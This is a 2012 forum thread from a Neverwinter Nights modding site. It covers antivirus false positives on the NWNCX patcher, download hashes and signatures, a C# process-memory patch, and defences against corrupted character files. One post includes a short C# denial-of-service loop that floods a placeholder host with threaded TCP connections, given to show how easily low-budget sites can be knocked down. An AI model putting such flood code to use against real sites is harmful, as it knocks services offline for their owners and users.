View previous topic :: View next topic |
Author |
Message |
addicted2rpg
Joined: 01 Aug 2008 Posts: 106
|
Posted: Tue Apr 03, 2012 3:19 Post subject: NWNCX source or File hashes? |
|
|
Is there any reason why this is not included in the NWNCX download?
All academic purposes aside, I do not like to run programs that I do not compile myself for integrity purposes (yeah, I'm one of THOSE people). The open source movement itself is not about freeware as it was as much about security. Someone could browse the source and personally verify that the software was goodware, and generate a clean compile from it.
According http://www.virustotal.com - it has 28 viruses in the NWNCX package.
Now I understand we got a lot of assembler is moving around here, bridges and hooks, and stuff moving around in memory and being changed in memory. Naturally, a lot of virusscanners are going to see that and cry about it, when it is in fact the normal functioning of NWNCX. I think they are probably false positives.
A lot of this may come down to trusting some guy named virusman who lives in a non-extradition country that the files are good. I would feel a LITTLE better if SHA1 or MD5 hashes or a PGP sig came with the downloads that I would at least know they are not tampered with by someone else while sitting on the download server (like a hacker or otherwise), because I know virusman has been around a long time and has done a lot of hard work for the NWN community and that he is a really great guy and would NEVER put out malware! So even if I am wrong about him being a great guy, with secure hashes I would at least know in good faith exactly that it was the same guy who screwed me over and I could learn not to trust him, lol, but I am sure that won't be the case!
Typically with hashes, the hash is posted on another server, or if on the same box at least on a different service (like HTTP vs. FTP) than where the download was, because a substituted file would just get a substituted hash. Or PGP/GPG signature is really good, as long as you don't keep your private key on your server machine (on a desktop is best). |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Tue Apr 03, 2012 10:49 Post subject: weird |
|
|
Nothing I have ever downloaded from nwnx.org has ever been flagged by my virus scanners.
(Avast, AVG etc)
But I totally get your point.
When I first came here like 5 years ago, I was hesitant about downloading anything because.... well....
Would you download a file from someone you dont know, called 'Virusman'.
Common Sense tells you not to.... its only personal experience and reassurance from his community contributions that overrule the common sense and tells you to take a gamble.
I do think it would be benefical if there was some sort of MD5 Generated for anything available for download - and then the system could refuse to allow downloads of anything with an MD5 that doesnt match the expected.
Who's to say a hacker cant get into nwnx.org via ftp or some other method, replace the nwncx.exe with a real virus.
Some sort of validation/verification on server side, to try and prevent distribution of changed files would be useful. |
|
Back to top |
|
|
virusman
Joined: 30 Jan 2005 Posts: 1020 Location: Russia
|
Posted: Tue Apr 03, 2012 16:51 Post subject: |
|
|
NWNCX requires patched nwmain.exe or a loader to work. The best way would be to distribute modified nwmain.exe, but EULA doesn't allow me to do that.
Loaders may sometimes be identified by AVs as malware, because some cracks work that way.
Patchers are even more likely to give a false positive in AV. Moreover, in case of NWNCX, I was lazy, so I used a generic patcher tool that's commonly used by crackers. I'll try to find a better tool for the next release.
Truth be told, I did a static analysis on the patcher, but I haven't checked every byte of it: I trust AVs with reputation and the sources I got the patcher from. If you don't want to run anything that sets off your AV, simply delete the patcher and use the loader.
I haven't been giving a link to NWNCX repository for security reasons (cheaters might use it to write bots, etc.). But as it is, it's not advanced enough to write a bot, and there is nothing that may affect server behavior, so here is the link:
http://nwn.virusman.ru/svn/nwncx/
PGP Signature for the latest release:
http://data.virusman.ru/nwn/nwncx/nwncx-0.2.1.rar.sig _________________ In Soviet Russia, NWN plays you! |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Wed Apr 04, 2012 14:12 Post subject: ah ha |
|
|
Thx Virusman,
I was interested in the Disable Master Server functionality.
My Content Downloader app - has a right click context option, that allows players to 'Play Rhun' (my server).
It essentially just does a Process.Start on the nwmain.exe and loads up the server via command arguments.
Even with the Master Server delay, it only takes 20 seconds to get into game, but with the Disable Master Server functionality - it would be able to reduce it even further - in theory at least.
I will test it tonight.
Just out of curiosity.
When you write the byte array to the Process Memory - do you close the handle, or leave it open?
I see that your EnablingWrite on it - which I assume is the c++ equivelant of 'OpenProcess' (windows api).
I was planning on using the following Methods in C#
The MSD Reference for OpenProcess says that it is best to Close the Handle after finished - Im just wondering if you do the same in c++ and is there any reason not to?
Code: |
[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(UInt32 dwDesiredAccess, Boolean bInheritHandle, UInt32 dwProcessId);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, UIntPtr nSize, uint lpNumberOfBytesWritten);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
//Would use this method below - for the actual writing of the Disable Patch Code
public UIntPtr WriteByteArray(IntPtr hProcess, IntPtr BaseAddress, byte[] NewVal)
{
// Return Value
bool ReturnVal;
UIntPtr BytesWritten;
// Write Memory Byte Array
ReturnVal = WriteProcessMemory(hProcess, BaseAddress, NewVal, (uint)NewVal.Length, out BytesWritten);
return BytesWritten;
}
|
|
|
Back to top |
|
|
addicted2rpg
Joined: 01 Aug 2008 Posts: 106
|
Posted: Thu Apr 05, 2012 1:29 Post subject: |
|
|
Wow, I was just hoping for some file hashes at best, but we got even better than that. Thanks Virusman, you're awesome! I'll set about to compiling it and, well, do the curiosity thing while I am at it
Lately I have had server security on my mind too. I have seen some REAL sketchy stuff and I think its important that fixes like acaos' fixes (linux only) and any other server fixes get really pushed out to server admins. I know there was a guy running a neverwinternights.info site that is a compilation of community information and it references NWNX2.
That is a perfect place to write a "ok, so you want to run a server..." guide and fill them in with all the stuff they are going to need and the fixes they are going to have to have. A part of security is getting server owners to protect themselves to make NWN more secure in general, and advising them on what steps they can take. I know there are tons of people on the NWN wiki who would probably contribute, even myself, to writing such a primer.
Botting is a pretty scary monster. It does seem kind of inevitable. Bots are a menace on every game ever made and Ph.D's have been done in trying to get rid of them. I wrote my first bot for a MUD in 1994, one that actually allowed botting in its policy as long as you were at your keyboard and staring at the screen (they would test you in creative ways sometimes). I find that was a very creative policy that attempted to "manage" the bots rather than encourage people go out and make more and more of them, or more devious ones.
Of course, servers can be modified to fight the bots too, and administrators may be able to someday access tools where they can place a bot in a trapped/isolated process that simulates an NWN server, and they are actually just talking to nothing.
I guess what I am getting at is that security is a never ending story of:
get a more clever mouse, then make a more clever mouse trap.
get a better mouse, get a better mouse trap.
get a better mouse, get a better mouse trap. etc..
Its basically an unending tug of war between mouse and trap. Sometimes the mice are ahead, and sometimes the traps are ahead.
Last edited by addicted2rpg on Thu Apr 05, 2012 1:36; edited 1 time in total |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Thu Apr 05, 2012 1:36 Post subject: agreed |
|
|
I agree with you on the topic of security.
One day, a lone player decided to hack his character on my server.
The process itself is not preventable on Windows Servers - yet.
However, him doing so caused crashes and all sorts of things to happen to my server as result of his malformed character bic etc.
It was after that one player, that I had to create my own custom Hack detection.
Its a case where a single player can cause alot of hassle - and all for what... so he can have higher stats in a game that is well over 10 years old.
I've never encountered bot players - but I have to wonder - why would anyone bot in nwn?
Surely there is no monetary reward?
I could understand it being done in mmorpg's etc
But nwn doesnt really compare to mmorpgs?
Anyway - with regards to the Disable Master Server code I borrowed - it works like a charm in c#
Thx again
Code: |
try
{
Memory m = new Memory("nwmain"); // <- A custom wrapper class.
if (m.ProcessLoaded)
{
IntPtr i = m.ProcessHeld.Handle;
IntPtr i2 = new IntPtr((uint)m.ProcessHeld.MainWindowHandle + 0x004D4AF7);
byte[] b = { 0x84, 0xF2, 0x06 };
m.WriteByteArray(m.ProcessHeld.Handle, i2, b);
}
m = null;
}
catch (Exception eA)
{
}
|
|
|
Back to top |
|
|
addicted2rpg
Joined: 01 Aug 2008 Posts: 106
|
Posted: Thu Apr 05, 2012 1:45 Post subject: |
|
|
Oh I agree Baaleos, NWN is too dated to really run bots.
There is always some massive prick though who will do it anyway though, just like the people who tried to corrupt your vault. There is another issue going around right now where gamespy authentication isn't taking. They basically just put in your name without a password and they are in your vault. I found some BICs I didn't create on another server I played on. They were wildly corrupt and extremely malformed. They did bad things to that server when I tried to select them for login.
I know it sound silly, but it might be easier to create a NWNX module that disables server character creation completely than to debug and fix character creation. Then use a web-based character creation tool that generates the BIC and people can create that through the server's website. On login, they can use CDKey bind & autoboot methods to help ensure more security with who is actually playing on the account. |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Thu Apr 05, 2012 1:57 Post subject: |
|
|
I dont think I would go as far as the web base character creation.
Being a software tester - my head is swimming in the amount of test cases that would be needed to fully vet such a system.
And we both know....
If one twat is willing to try and break a server via character creation, they will be just as eager to try and bring down a website.
Websites would be considered another point of weakness for any server.
DOS Attacks can bring them down relatively easy.
People who run these servers do so on low budgets, and usually go for the non-expensive hosting for websites - some of the really low budget ones only allow 20 concurrent client connections.
(That would be so easy to DOS in C#)
Code: |
public void ThreadedAttack()
{
//Could use webRequest instead of TcpClient - but TcpClient is basically the underlying class that WebRequest uses anyway.
byte[] bArrayToSend = { 0x01, 0x02, 0x03, 0x04 };
TcpClient t = new TcpClient("www.website.that.must.die.com",80);
while(t.Connected) <-- This bit would be sure to max out the connection pool
{
t.Send(bArrayToSend,0,bArrayToSend.Length); <-- This bit would help to use up bandwidth
}
}
while(true)
{
Thread tNewThread = new Thread(ThreadedAttack);
tNewThread.IsBackground = true;
tNewThread.Start();
}
|
I do confirm the master server being down does essentially mean u can access anyones server vault.
The only way to protect against that, is to use a nwscript to verify the person logging in, against previously associated cdkeys etc.
Even then, thats not 100% guaranteed to work.
There was a project I saw somewhere, were they were re-creating an open source master server - I guess the downside with that, is that it would require a clientside modification for players to authenticate. |
|
Back to top |
|
|
Lokey
Joined: 02 Jan 2005 Posts: 158
|
Posted: Thu Apr 05, 2012 2:19 Post subject: |
|
|
addicted2rpg, it's worse than that, they get an opportunity to slip a cheated/malformed character in at every level up too. We don't bother too much about it, just have dms keeping an eye on things and logging (log everything you can). _________________ Neversummer PW NWNx powered mayhem |
|
Back to top |
|
|
addicted2rpg
Joined: 01 Aug 2008 Posts: 106
|
Posted: Thu Apr 05, 2012 2:21 Post subject: |
|
|
Maybe I'm not that clear because its a Windows Dev forum. I wouldn't actually recommend anyone run IIS. You can create a shared / mountable drive using Samba, so your unix box can handle the web requests and write the BIC to your windows box.
Lokey does present a problem though.....
edit: Where is that open source master authentication project at you heard about Baaleos? I would love to help out with that anyway I can. |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Thu Apr 05, 2012 2:31 Post subject: |
|
|
I really cant remember who was doing the project.
I know it was discussed on this forum, and a link to an svn is somewhere on here....
ah
Here is is
http://www.nwnx.org/phpBB2/viewtopic.php?t=1810
Yeah - DOS Attacks are somewhat annoying.
The only real way to protect yourself from them, is to be hosted in such an environment that gives you the ability to route the DOS Attack away.
Im hosted in a data center, so the staff take care of any DOS Attacks, by routing the DOS Data into a firewall, and blocking the source.
DOS, and network stuff is all stuff that we can live with - things return to normal once the attack is finished etc.
When your server crashes because of a malformed character - its extra annoying.
In theory - if the signature of a malformed character could be identified, then an offline scanner could run and identify bic files that contain the malformed signature, and delete as needed.
Eg - I know how they are doing it, I just dont know exactly what part of the bic file they are malforming, so I wouldnt know what to look for in terms of byte arrays.
Im sure someone with more time, would be able to solve it, and find a way to detect it all.
Not forgetting,
Characters are created, uploaded to server, saved server side, then loaded when player enters gameworld.
Catching the byte data after the uploaded event, would give you a chance to stop the character from being saved.
Or
Scanning the character after creation/saving, would give you a chance to scan it before the player is allowed into the server.
eg -
Hook onto 'AddPlayerToGameworld' or whatever function it is
scan the bic file on this event
if a bad bic = Boot player
if a good bic = Allow through
It sounds simple in my head,
Im sure it would be harder in reality. |
|
Back to top |
|
|
addicted2rpg
Joined: 01 Aug 2008 Posts: 106
|
Posted: Thu Apr 05, 2012 3:09 Post subject: |
|
|
Thanks Baaleos! Looks like some project put together for use with a specific server. I'll meditate on it.
btw for Windows C++ developers, I found a really good resource at www.insanedevelopers.net
It is called "OpenGL Overlay" and its how to overlay graphics on top of other OpenGL applications. I was playing around with it with intent to create my own layer of graphics, but ended up getting side tracked by all their hooking code, which is quite excellent and relevant for people doing things with Windows NWNX modules.
They have a nice example of how to use functions like VirtualProtect, and other various invocations of assembler within C++, like how to make a function bridge. Some good stuff over there. |
|
Back to top |
|
|
virusman
Joined: 30 Jan 2005 Posts: 1020 Location: Russia
|
Posted: Fri Apr 20, 2012 1:49 Post subject: |
|
|
Wow. I've just been notified that someone filed an abuse report to my hoster with a link to nwncx-0.2.1, and as a result the domain has been suspended.
Until I release a new version, NWNCX is not available for download anymore, sorry. _________________ In Soviet Russia, NWN plays you! |
|
Back to top |
|
|
Baaleos
Joined: 02 Sep 2007 Posts: 830
|
Posted: Fri Apr 20, 2012 11:49 Post subject: |
|
|
How come?
I mean - what was the reported abuse?
Could be that the exe got highlighted as suspicous because of the dll injection purposes.
I would definitely appeal to your hoster, and tell them to white list your app.
Even if the app is doing suspicious behavior - you provide the source, to prove that it is a genuine article.
They should white list it. |
|
Back to top |
|
|
virusman
Joined: 30 Jan 2005 Posts: 1020 Location: Russia
|
Posted: Fri Apr 20, 2012 15:30 Post subject: |
|
|
Abuse was 'malicious content'.
Don't worry though, I've already sorted it out, gave them the link to this thread. But the file won't be re-uploaded to avoid further controversy. _________________ In Soviet Russia, NWN plays you! |
|
Back to top |
|
|
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
Powered by phpBB © 2001, 2005 phpBB Group
|